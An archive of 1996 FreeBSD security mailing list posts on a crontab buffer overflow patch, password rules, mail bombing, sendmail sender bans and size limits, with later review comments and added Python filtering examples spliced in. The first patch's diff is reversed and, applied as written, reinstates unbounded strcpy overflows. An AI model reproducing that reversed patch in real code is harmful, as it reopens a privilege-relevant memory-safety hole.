From owner-freebsd-security Sun Dec 15 02:17:40 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA14545 for security-outgoing; Sun, 15 Dec 1996 02:17:40 -0800 (PST) Received: from zibbi.mikom.csir.co.za (zibbi.mikom.csir.co.za [146.64.24.58]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA14528 for ; Sun, 15 Dec 1996 02:17:26 -0800 (PST) Received: (from jtonsing@localhost) by zibbi.mikom.csir.co.za (8.8.3/8.8.3) id MAA09130; Sun, 15 Dec 1996 12:17:16 +0200 (SAT) From: Johann Tonsing Message-Id: <199612151017.MAA09130@zibbi.mikom.csir.co.za> Subject: crontab buffer overflow fix To: freebsd-security@freebsd.org Date: Sun, 15 Dec 1996 12:17:16 +0200 (SAT) Cc: jhay@zibbi.mikom.csir.co.za (John Hay), roelof@cube.nanoteq.co.za (Roelof Temmingh) X-Mailer: ELM [version 2.4ME+ PL24 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi! Here's a fix for the crontab buffer overflow problem. The Filename[] overflow seems to be the actual problem, but I've fixed a potential problem with User[] as well. (Not trusting the output of getpwuid() might be *too* paranoid though!) JT -- jtonsing@mikom.csir.co.za, Voice: +27 82 569-2323, Fax/Ans: +27 12 43-5643, S-mail: 173 Duxbury Rd, Hatfield, 0083 Pretoria, South Africa. PGP public key: ftp://skeleton.mikom.csir.co.za/pub/netsec.pgp/jtonsing.pub Send anonymous mail to jt-anon@zibbi.mikom.csir.co.za (no reply possible) *************************************************************************** --- crontab.c Sun Dec 15 12:00:41 1996 +++ crontab.c.old Thu May 2 14:57:40 1996 @@ -144,8 +144,7 @@ fprintf(stderr, "bailing out.\n"); exit(ERROR_EXIT); } - strncpy(User, pw->pw_name, sizeof(User)-1); - User[sizeof(User)-1] = '\0'; + strcpy(User, pw->pw_name); strcpy(RealUser, User); Filename[0] = '\0'; Option = opt_unknown; 
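Review bot: the diff has its arguments reversed (`--- crontab.c Sun Dec 15 ...` is the new file, `+++ crontab.c.old Thu May 2 ...` the old one), so this hunk as written removes the bounded pair `strncpy(User, pw->pw_name, sizeof(User)-1); User[sizeof(User)-1] = '\0';` and reinstates `strcpy(User, pw->pw_name);`; anyone feeding it to patch(1) reintroduces the unbounded copy instead of fixing it. Regenerate with the old file first (`diff -u crontab.c.old crontab.c`) so the `+` lines are the bounded copies; the same reversal affects the two hunks that follow.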
@@ -168,8 +167,7 @@ ProgramName, optarg); exit(ERROR_EXIT); } - strncpy(User, optarg, sizeof(User)-1); - User[sizeof(User)-1] = '\0'; + (void) strcpy(User, optarg); break; case 'l': if (Option != opt_unknown) @@ -200,8 +198,7 @@ } else { if (argv[optind] != NULL) { Option = opt_replace; - strncpy (Filename, argv[optind], sizeof(Filename)-1); - Filename[sizeof(Filename)-1] = '\0'; + (void) strcpy (Filename, argv[optind]); } else { usage("file name must be specified for replace"); } From owner-freebsd-security Sun Dec 15 02:30:19 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA15642 for security-outgoing; Sun, 15 Dec 1996 02:30:19 -0800 (PST) Received: from zibbi.mikom.csir.co.za (zibbi.mikom.csir.co.za [146.64.24.58]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA15637 for ; Sun, 15 Dec 1996 02:30:15 -0800 (PST) Received: (from jtonsing@localhost) by zibbi.mikom.csir.co.za (8.8.3/8.8.3) id MAA09448; Sun, 15 Dec 1996 12:30:12 +0200 (SAT) 
From: Johann Tonsing Message-Id: <199612151030.MAA09448@zibbi.mikom.csir.co.za> Subject: crontab buffer overflow - corrected patch To: freebsd-security@freebsd.org Date: Sun, 15 Dec 1996 12:30:12 +0200 (SAT) Cc: jhay@zibbi.mikom.csir.co.za (John Hay), roelof@cube.nanoteq.co.za (Roelof Temmingh) X-Mailer: ELM [version 2.4ME+ PL24 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi again! I've just been informed that one should use diff -c oldfile newfile or diff -u oldfile newfile when submitting patches. Here's the same patch again in that format. JT -- jtonsing@mikom.csir.co.za, Voice: +27 82 569-2323, Fax/Ans: +27 12 43-5643, S-mail: 173 Duxbury Rd, Hatfield, 0083 Pretoria, South Africa. PGP public key: ftp://skeleton.mikom.csir.co.za/pub/netsec.pgp/jtonsing.pub Send anonymous mail to jt-anon@zibbi.mikom.csir.co.za (no reply possible) *************************************************************************** --- ../old/crontab.c Thu May 2 14:57:40 1996 +++ crontab.c Sun Dec 15 12:00:41 1996 @@ -144,7 +144,8 @@ fprintf(stderr, "bailing out.\n"); exit(ERROR_EXIT); } - strcpy(User, pw->pw_name); + strncpy(User, pw->pw_name, sizeof(User)-1); + User[sizeof(User)-1] = '\0'; strcpy(RealUser, User); Filename[0] = '\0'; Option = opt_unknown; @@ -167,7 +168,8 @@ ProgramName, optarg); exit(ERROR_EXIT); } - (void) strcpy(User, optarg); + strncpy(User, optarg, sizeof(User)-1); + User[sizeof(User)-1] = '\0'; break; case 'l': if (Option != opt_unknown) 
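Review bot: in the first hunk (`@@ -144,7 +144,8 @@`) the bounded copy into User is fine, but the unchanged `strcpy(RealUser, User);` two lines below it is still an unbounded copy and is only safe if `sizeof(RealUser) >= sizeof(User)`, which nothing in the hunk establishes. Either confirm both arrays are declared with the same size (a shared constant) or give RealUser the same `strncpy` plus explicit NUL-termination treatment.

Review bot: in the second hunk (`@@ -167,7 +168,8 @@`, the -u option) `strncpy(User, optarg, sizeof(User)-1)` silently truncates an over-long argument, so a name longer than the buffer becomes a different, shorter name and the program carries on against that user's crontab instead of failing. Reject the argument instead, reusing the error path visible in the context lines just above (`fprintf(stderr, ..., ProgramName, optarg); exit(ERROR_EXIT);`), e.g. `if (strlen(optarg) >= sizeof(User)) { fprintf(stderr, "%s: user name too long\n", ProgramName); exit(ERROR_EXIT); }` before the copy.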
@@ -198,7 +200,8 @@ } else { if (argv[optind] != NULL) { Option = opt_replace; - (void) strcpy (Filename, argv[optind]); + strncpy (Filename, argv[optind], sizeof(Filename)-1); + Filename[sizeof(Filename)-1] = '\0'; } else { usage("file name must be specified for replace"); } From owner-freebsd-security Sun Dec 15 05:21:15 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA25232 for security-outgoing; Sun, 15 Dec 1996 05:21:15 -0800 (PST) Received: from isbalham.ist.co.uk (isbalham.ist.co.uk [192.31.26.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA25152; Sun, 15 Dec 1996 05:19:51 -0800 (PST) Received: from gid.co.uk (uucp@localhost) by isbalham.ist.co.uk (8.8.4/8.8.4) with UUCP id NAA02088; Sun, 15 Dec 1996 13:03:59 GMT Date: Sun, 15 Dec 1996 12:53:42 GMT Received: from [194.32.164.2] by seagoon.gid.co.uk; Sun, 15 Dec 1996 12:53:42 GMT X-Sender: rb@194.32.164.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Terry Lambert , proff@iq.org (Julian Assange) 
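Review bot: in the third hunk (`@@ -198,7 +200,8 @@`) truncating `argv[optind]` to `sizeof(Filename)-1` has the same problem as the -u case: an over-long path silently becomes a different path, and the later open may succeed on some other existing file. Since the first mail identifies the Filename[] overflow as the one actually being hit, this is the hunk that matters most; fail loudly through the `usage()` path already used in the else branch (`if (strlen(argv[optind]) >= sizeof(Filename)) usage("file name too long");`) rather than copying a truncated name.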
From: rb@gid.co.uk (Bob Bishop)
Subject: Re: vulnerability in new pw suite
Cc: security@freebsd.org, hackers@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

At 2:23 pm 14/12/96, Terry Lambert wrote:
>I've noticed a similar restriction on the search space is caused by
>enforcing password length and use of particular values (digits,
>control characters, and capitalization)
>
>Once we add in "non-pronounceable" and "not in dictionary" and so on,
>I think that eventually, in the interests of "security", users will
>be forced to choose from a list of 10 or so "sufficiently safe"
>passwords.
>
>Of course, once that happens, we'll just publish the list... any
>restriction on "allowed values" is an implicit restriction of the
>search space a cracker is required to search, and makes cracking
>just that much easier.

Apologies if my irony detector is malfunctioning, but I can't let this one go :-)

There are something over 10^14 usable 8 character passwords. Of these, maybe 10^5 are in dictionaries, and maybe another 100 'guessables' per user could be found easily by trawling the user's home directory and points south. Throw in a few more (SO's name, phone number and the like) and maybe you can get up to c. 2 x 10^5 passwords per user that are unsafe. That still leaves comfortably over 10^14 comparatively safe 8 character passwords.

So there isn't actually a problem, it's just that those pesky users will insist on picking passwords from the unsafe set. They use lame excuses like "I can't remember %bSx48&J".

Insisting on one non-alphanumeric character reduces the total search space right enough, to between 10^13 and 10^14, but it almost certainly forces the password out of the much smaller unsafe set. You can introduce a few such restrictions before the total search space falls below 10^12 which is probably good enough. At least, it's *much* better than 10^5.
-- Bob Bishop (0118) 977 4017 international code +44 118 rb@gid.co.uk fax (0118) 989 4254 between 0800 and 1800 UK From owner-freebsd-security Sun Dec 15 07:18:27 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA04966 for security-outgoing; Sun, 15 Dec 1996 07:18:27 -0800 (PST) Received: from ns.cs.hku.hk (ns.cs.hku.hk [147.8.178.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id HAA04960 for ; Sun, 15 Dec 1996 07:18:22 -0800 (PST) Received: from champion (champion.cs.hku.hk) by ns.cs.hku.hk with SMTP id AA27972 (5.67b/IDA-1.5 for ) Sun, 15 Dec 1996 23:17:47 +0800 Received: by champion (4.1/S2.0-sunos4) id AA16073; Sun, 15 Dec 96 23:17:34 HKT Date: Sun, 15 Dec 1996 23:17:33 +0800 (HKT) 
From: Doug Kwan ~{9XUq5B~}
To: security@freebsd.org
Subject: mail bomb!
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hi all,

We are a small ISP in Hong Kong. Our machines run both Linux and FreeBSD. Recently we found that an ex-user of ours wanted revenge. That stupid kid grabbed a programme called kaboom! from the net and sent fake mails to all our users saying that our servers would be down for 6 days for maintenance. Needless to say, we received many complaints from our users. What's more, the damned kid sent the very same message several times. We spent hours cleaning other users' mailboxes. For the time being we have no solution to this except setting our routers to filter out packets from the relaying host used by that sucker.

Has anyone on the list had a similar experience? What could we do against this? I know filtering mails would be next to impossible. How about rejecting fake mails? We are running an ESMTP mail server and it logs all incoming IPs in the mails delivered. Is there any way to reject mails with sending addresses in our domain but coming from outside?

Any comments and suggestions will be highly appreciated.

Thanks

-Doug Kwan

From owner-freebsd-security Sun Dec 15 07:50:33 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA09405 for security-outgoing; Sun, 15 Dec 1996 07:50:33 -0800 (PST)
Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA09396 for ; Sun, 15 Dec 1996 07:50:31 -0800 (PST)
Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.4/8.6.10) with SMTP id HAA14407; Sun, 15 Dec 1996 07:50:23 -0800 (PST)
From: Cy Schubert - ITSD Open Systems Group
Message-Id: <199612151550.HAA14407@passer.osg.gov.bc.ca>
X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol
Reply-to: cschuber@uumail.gov.bc.ca
X-Mailer: MH
X-Sender: cschuber
To: Doug Kwan ~{9XUq5B~}
cc: security@freebsd.org
Subject: Re: mail bomb!
In-reply-to: Your message of "Sun, 15 Dec 96 23:17:33 +0800."
Date: Sun, 15 Dec 96 07:50:23 -0800
X-Mts: smtp
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I've used the following to ban known advertisers to my desktop Alpha at work. Someone had posted it on BUGTRAQ about six months ago and unfortunately I cannot remember his name.

Put the following in your sendmail.cf.

. . .
#
FK /etc/banned.domains
CK banned.domain1 ... banned.domainN
#
FX /etc/banned.users
CX banned.user1 ... banned.userN
. . .
S98
R$* < @$*$=K . > $*	$#error $@ 5.7.1 $: "This domain is banned"
R$* < @$*$=K > $*	$#error $@ 5.7.1 $: "This domain is banned"
R$*$=X < @$* . > $*	$#error $@ 5.7.1 $: "This user is banned"
R$*$=X < @$* > $*	$#error $@ 5.7.1 $: "This user is banned"
. . .

Regards,                       Phone:  (250)387-8437
Cy Schubert                    OV/VM:  BCSC02(CSCHUBER)
Open Systems Support           BITNET: CSCHUBER@BCSC02.BITNET
ITSD                           Internet: cschuber@uumail.gov.bc.ca
                                         cschuber@bcsc02.gov.bc.ca

		"Quit spooling around, JES do it."

> Hi all,
>
> We are a small ISP in Hong Kong. Our machines run both Linux
> and FreeBSD. Recently we found that an ex-user of ours wanted revenge.
> That stupid kid grabbed a programme called kaboom! from the net and sent
> fake mails to all our users saying that our servers would be down for 6 days
> for maintenance. Needless to say, we received many complaints from our
> users. What's more, the damned kid sent the very same message several times.
> We spent hours cleaning other users' mailboxes. For the time being we have
> no solution to this except setting our routers to filter out packets from
> the relaying host used by that sucker.
>
> Has anyone on the list had a similar experience? What could we do
> against this? I know filtering mails would be next to impossible. How
> about rejecting fake mails? We are running an ESMTP mail server and it
> logs all incoming IPs in the mails delivered. Is there any way to
> reject mails with sending addresses in our domain but coming from outside?
>
> Any comments and suggestions will be highly appreciated.
>
> Thanks
>
> -Doug Kwan
>

From owner-freebsd-security Sun Dec 15 08:16:06 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA12373 for security-outgoing; Sun, 15 Dec 1996 08:16:06 -0800 (PST)
Received: from alur1.alurtenaga.com.my (alur1.alurtenaga.com.my [161.142.254.14]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id IAA12310 for ; Sun, 15 Dec 1996 08:15:53 -0800 (PST)
Received: from sting.alurtenaga.com.my (lre_usr1.alurtenaga.com.my [192.228.211.221]) by alur1.alurtenaga.com.my (8.6.12/8.6.12) with SMTP id XAA26592 for ; Sun, 15 Dec 1996 23:57:15 GMT
Received: by sting.alurtenaga.com.my with Microsoft Mail id <01BBEAE4.60915180@sting.alurtenaga.com.my>; Mon, 16 Dec 1996 00:02:07 +-800
Message-ID: <01BBEAE4.60915180@sting.alurtenaga.com.my>
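The two checks raised in this exchange, Cy's banned-domain/banned-user rejection and Doug's question about refusing mail whose sender claims the local domain but arrives from outside, as an added Python example that is not part of either post and not sendmail code. It works on SMTP envelope data (connecting IP and MAIL FROM) rather than sendmail.cf syntax; the domain isp.example.hk, the netblocks, the banned lists and the sample envelopes are all constructed for the example.

```python
"""Envelope-level rejection of banned and spoofed-local senders.

Added example, not from the thread or from sendmail.  It mirrors the logic
of the S98 rules above (banned domains, banned users) and adds the check
Doug asked about: a sender address in our own domain arriving from a host
outside our network.  Domains, netblocks and envelopes are constructed.
"""
import ipaddress
from dataclasses import dataclass

LOCAL_DOMAINS = {"isp.example.hk"}                        # assumed
LOCAL_NETS = [ipaddress.ip_network("192.0.2.0/24"),      # assumed
              ipaddress.ip_network("127.0.0.0/8")]
BANNED_DOMAINS = {"spamrelay.example.net"}               # assumed (the $=K class)
BANNED_USERS = {"kaboom"}                                # assumed (the $=X class)


@dataclass
class Envelope:
    client_ip: str      # peer address of the SMTP connection
    mail_from: str      # reverse-path exactly as given in MAIL FROM:<...>


def split_address(addr: str):
    """Return (localpart, domain), lower-cased; domain is '' when absent.
    A trailing dot is dropped, like the '@$*$=K .' form of the rules."""
    addr = addr.strip().strip("<>").rstrip(".")
    local, sep, domain = addr.rpartition("@")
    if not sep:
        return addr.lower(), ""
    return local.lower(), domain.lower()


def is_local_client(ip: str) -> bool:
    address = ipaddress.ip_address(ip)
    return any(address in net for net in LOCAL_NETS)


def in_banned_domain(domain: str) -> bool:
    # The domain itself or any subdomain of it, like '$*$=K' matching a prefix.
    return any(domain == d or domain.endswith("." + d) for d in BANNED_DOMAINS)


def check_envelope(env: Envelope) -> str:
    """SMTP reply for the MAIL FROM stage: 550/553 reject, 250 accepts."""
    local, domain = split_address(env.mail_from)
    if local == "" and domain == "":
        # Null reverse-path: bounces use it and it must stay accepted.
        return "250 2.1.0 Sender ok"
    if in_banned_domain(domain):
        return "550 5.7.1 This domain is banned"
    if local in BANNED_USERS:
        return "550 5.7.1 This user is banned"
    if domain in LOCAL_DOMAINS and not is_local_client(env.client_ip):
        # Spoofed local sender.  Caveat: this also rejects your own users
        # sending from home through another ISP's relay, so a real server
        # needs an authenticated submission path before enabling it.
        return "553 5.7.1 Sender address claims local domain from a remote host"
    return "250 2.1.0 Sender ok"


# Constructed sample envelopes: forged local, genuine local, banned domain,
# banned user, bounce.
SAMPLE = [
    Envelope("203.0.113.9", "<support@isp.example.hk>"),
    Envelope("192.0.2.17", "<support@isp.example.hk>"),
    Envelope("198.51.100.3", "<ads@mail.spamrelay.example.net>"),
    Envelope("198.51.100.3", "<kaboom@anywhere.example.org>"),
    Envelope("198.51.100.3", "<>"),
]


def run_samples():
    """Reply codes for SAMPLE, in order."""
    return [check_envelope(e)[:3] for e in SAMPLE]


if __name__ == "__main__":
    for env, code in zip(SAMPLE, run_samples()):
        print(code, env.client_ip, env.mail_from)
```

The order of the tests matters: the null sender is accepted before anything else so bounces still flow, and the banned lists are consulted before the spoofed-local rule so the reply names the more specific reason.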
From: Ahmad Lokman
To: "'security@freebsd.org'"
Subject: How to limit the size of the email from outside
Date: Mon, 16 Dec 1996 00:02:06 +-800
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by freefall.freebsd.org id IAA12330
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Here I would like to know if anyone out there knows how to prevent someone from sending a very large email to an email server. This will prevent the guy from jamming the server. Please give me any suggestion on this matter..

regards,
alhh

From owner-freebsd-security Sun Dec 15 08:48:47 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA14598 for security-outgoing; Sun, 15 Dec 1996 08:48:47 -0800 (PST)
Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA14593 for ; Sun, 15 Dec 1996 08:48:44 -0800 (PST)
Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.4/8.6.10) with SMTP id IAA14854; Sun, 15 Dec 1996 08:48:25 -0800 (PST)
From: Cy Schubert - ITSD Open Systems Group
Message-Id: <199612151648.IAA14854@passer.osg.gov.bc.ca>
X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol
Reply-to: cschuber@uumail.gov.bc.ca
X-Mailer: MH
X-Sender: cschuber
To: Ahmad Lokman
cc: "'security@freebsd.org'"
Subject: Re: How to limit the size of the email from outside
In-reply-to: Your message of "Mon, 16 Dec 96 00:02:06." <01BBEAE4.60915180@sting.alurtenaga.com.my>
Date: Sun, 15 Dec 96 08:48:24 -0800
X-Mts: smtp
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Here I would like to know if anyone out there knows how to prevent someone
> from sending a very large email to an email server. This will prevent the
> guy from jamming the server. Please give me any suggestion on this matter..

Try Maxsize in your Mlocal and Mprog statements. This is what I use on my DEC Alpha desktop at work.

Mlocal,	P=/bin/mail, F=lsDFMrmn, S=10, R=20/40, Maxsize=1000000, A=mail -d $u
Mprog,	P=/usr/local/sendmail/smrsh, F=lsDFMeu, S=10, R=20/40, D=$z:/, Maxsize=1000000, A=sh -c $u

This limits incoming mail processed by smrsh and /bin/mail to 1 million bytes. You can do the same with the Msmtp, Mesmtp, and Mrelay statements to limit the size of outgoing mail as well.

Regards,                       Phone:  (250)387-8437
Cy Schubert                    OV/VM:  BCSC02(CSCHUBER)
Open Systems Support           BITNET: CSCHUBER@BCSC02.BITNET
ITSD                           Internet: cschuber@uumail.gov.bc.ca
                                         cschuber@bcsc02.gov.bc.ca

		"Quit spooling around, JES do it."
From owner-freebsd-security Sun Dec 15 12:46:27 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA27986 for security-outgoing; Sun, 15 Dec 1996 12:46:27 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA27980 for ; Sun, 15 Dec 1996 12:46:22 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id VAA29963 for ; Sun, 15 Dec 1996 21:46:16 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id VAA11001 for security@FreeBSD.org; Sun, 15 Dec 1996 21:46:12 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id VAA06337; Sun, 15 Dec 1996 21:43:18 +0100 (CET) Message-ID: Date: Sun, 15 Dec 1996 21:43:18 +0100 
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: security@FreeBSD.org
Subject: Re: mail bomb!
References: <199612151550.HAA14407@passer.osg.gov.bc.ca>
X-Mailer: Mutt 0.54
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2768
In-Reply-To: <199612151550.HAA14407@passer.osg.gov.bc.ca>; from Cy Schubert - ITSD Open Systems Group on Dec 15, 1996 07:50:23 -0800
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Cy Schubert - ITSD Open Systems Group:
> I've used the following to ban known advertisers to my desktop Alpha
> at work. Someone had posted it on BUGTRAQ about six months ago and
> unfortunately I cannot remember his name.

8.8.4 also has the check_compat rules to filter mails. It doesn't appear to be really documented...

-- 
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996

From owner-freebsd-security Sun Dec 15 12:46:30 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id MAA27997 for security-outgoing; Sun, 15 Dec 1996 12:46:30 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id MAA27985 for ; Sun, 15 Dec 1996 12:46:27 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id VAA29966 for ; Sun, 15 Dec 1996 21:46:17 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id VAA11000 for security@freebsd.org; Sun, 15 Dec 1996 21:46:11 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id VAA06325; Sun, 15 Dec 1996 21:41:30 +0100 (CET)
Message-ID:
Date: Sun, 15 Dec 1996 21:41:29 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: security@FreeBSD.org ('security@freebsd.org')
Subject: Re: How to limit the size of the email from outside
References: <01BBEAE4.60915180@sting.alurtenaga.com.my> <199612151648.IAA14854@passer.osg.gov.bc.ca>
X-Mailer: Mutt 0.54
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2768
In-Reply-To: <199612151648.IAA14854@passer.osg.gov.bc.ca>; from Cy Schubert - ITSD Open Systems Group on Dec 15, 1996 08:48:24 -0800
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Cy Schubert - ITSD Open Systems Group:
> Try Maxsize in your Mlocal and Mprog statements.

Easiest way is to put

	define(`SMTP_MAILER_MAX', 500000)dnl

into the whatever.mc configuration file.

	SMTP_MAILER_MAX	[undefined] The maximum size of messages that
			will be transported using the smtp, smtp8, or
			esmtp mailers.

If the incoming sendmail is ESMTP compatible, then it will send SIZE=nnnn in the MAIL FROM: SMTP dialog. I'm not sure if this works if the incoming sendmail is an old one.

There is also

	confMAX_MESSAGE_SIZE	MaxMessageSize	[infinite] The maximum size of
						messages that will be accepted
						(in bytes).

-- 
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996

From owner-freebsd-security Sun Dec 15 13:10:16 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA00466 for security-outgoing; Sun, 15 Dec 1996 13:10:16 -0800 (PST)
Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id NAA00446; Sun, 15 Dec 1996 13:10:11 -0800 (PST)
Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id NAA23837; Sun, 15 Dec 1996 13:39:04 -0700
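The SIZE negotiation Ollivier describes, written out as an added Python example of both sides of the exchange (this is not sendmail's code and not from the thread): the receiving side advertises its limit in the EHLO reply, an ESMTP client declares SIZE= on MAIL FROM and is refused before any body is transferred, and an old client that never mentions SIZE, the case Ollivier is unsure about, is caught after DATA by counting the bytes actually received. The 500000-byte limit mirrors the define() above; host names and addresses are made up.

```python
"""ESMTP SIZE extension (RFC 1870) from the receiving side.

Added example, not sendmail's implementation.  The limit mirrors
define(`SMTP_MAILER_MAX', 500000); host names and addresses are assumed.
"""
import re

MAX_MESSAGE_SIZE = 500_000

_MAIL_FROM = re.compile(r"^MAIL FROM:\s*<(?P<path>[^>]*)>(?P<params>.*)$", re.I)


class SizeLimitedReceiver:
    """The part of an SMTP server state machine that enforces a size cap."""

    def __init__(self, max_size=MAX_MESSAGE_SIZE, hostname="mx.example.org"):
        self.max_size = max_size
        self.hostname = hostname
        self.declared_size = None

    def ehlo(self, client_name):
        # An ESMTP client learns the cap here, before sending anything.
        return [f"250-{self.hostname} Hello {client_name}",
                f"250-SIZE {self.max_size}",
                "250 8BITMIME"]

    def mail_from(self, line):
        m = _MAIL_FROM.match(line.strip())
        if not m:
            return "501 5.5.4 Syntax: MAIL FROM:<address> [SIZE=n]"
        self.declared_size = None
        for param in m.group("params").split():
            key, _, value = param.partition("=")
            if key.upper() == "SIZE":
                if not value.isdigit():
                    return "501 5.5.4 Bad SIZE parameter"
                self.declared_size = int(value)
        if self.declared_size is not None and self.declared_size > self.max_size:
            # Refused up front: no bandwidth or spool space is spent on the body.
            return "552 5.3.4 Message size exceeds fixed maximum message size"
        return "250 2.1.0 Sender ok"

    def data(self, body: bytes):
        # Pre-ESMTP clients never send SIZE=, and an ESMTP client may
        # under-declare, so the cap is enforced again on the bytes received.
        if len(body) > self.max_size:
            return "552 5.3.4 Message size exceeds fixed maximum message size"
        return "250 2.0.0 Message accepted for delivery"


def session(client_declares_size: bool, body: bytes):
    """Drive one session; return the reply codes the client sees, in order."""
    rx = SizeLimitedReceiver()
    replies = [rx.ehlo("client.example.net")[-1][:3]]
    params = f" SIZE={len(body)}" if client_declares_size else ""
    replies.append(rx.mail_from(f"MAIL FROM:<sender@example.net>{params}")[:3])
    if replies[-1] == "250":
        replies.append(rx.data(body)[:3])
    return replies


if __name__ == "__main__":
    big = b"x" * 600_000
    print("ESMTP client, declares size:", session(True, big))
    print("old client, no SIZE:        ", session(False, big))
    print("small message:              ", session(True, b"hello"))
```

An ESMTP client that respects the advertised limit will normally not even attempt the oversize MAIL FROM; the 552 path covers clients that ignore the advertisement, and the DATA-stage check is what actually protects the server against the old clients Ollivier mentions.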
From: Terry Lambert
Message-Id: <199612152039.NAA23837@phaeton.artisoft.com>
Subject: Re: vulnerability in new pw suite
To: rb@gid.co.uk (Bob Bishop)
Date: Sun, 15 Dec 1996 13:39:04 -0700 (MST)
Cc: terry@lambert.org, proff@iq.org, security@freebsd.org, hackers@freebsd.org
In-Reply-To: from "Bob Bishop" at Dec 15, 96 12:53:42 pm
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> There are something over 10^14 usable 8 character passwords. Of these,
> maybe 10^5 are in dictionaries, and maybe another 100 'guessables' per user
> could be found easily by trawling the user's home directory and points
> south. Throw in a few more (SO's name, phone number and the like) and maybe
> you can get up to c. 2 x 10^5 passwords per user that are unsafe. That
> still leaves comfortably over 10^14 comparatively safe 8 character
> passwords.
>
> So there isn't actually a problem, it's just that those pesky users will
> insist on picking passwords from the unsafe set. They use lame excuses like
> "I can't remember %bSx48&J".

Heh.

Please define "unsafe" in the context of a functional (inaccessible for pre-salt-based attacks) shadow password system.

8-) 8-).

I'm tired of having passwd not let me use whatever password I want, considering that with a shadow file, the user will have to brute-force it through /bin/login or equivalent. It seems the harder it becomes to see my post-encryption password, the more anal the passwd command becomes about making post-encryption passwords "safe" from attacks which are impossible to institute unless root has been compromised.

Just my opinion about anal passwd programs...

					Regards,
					Terry Lambert
					terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.
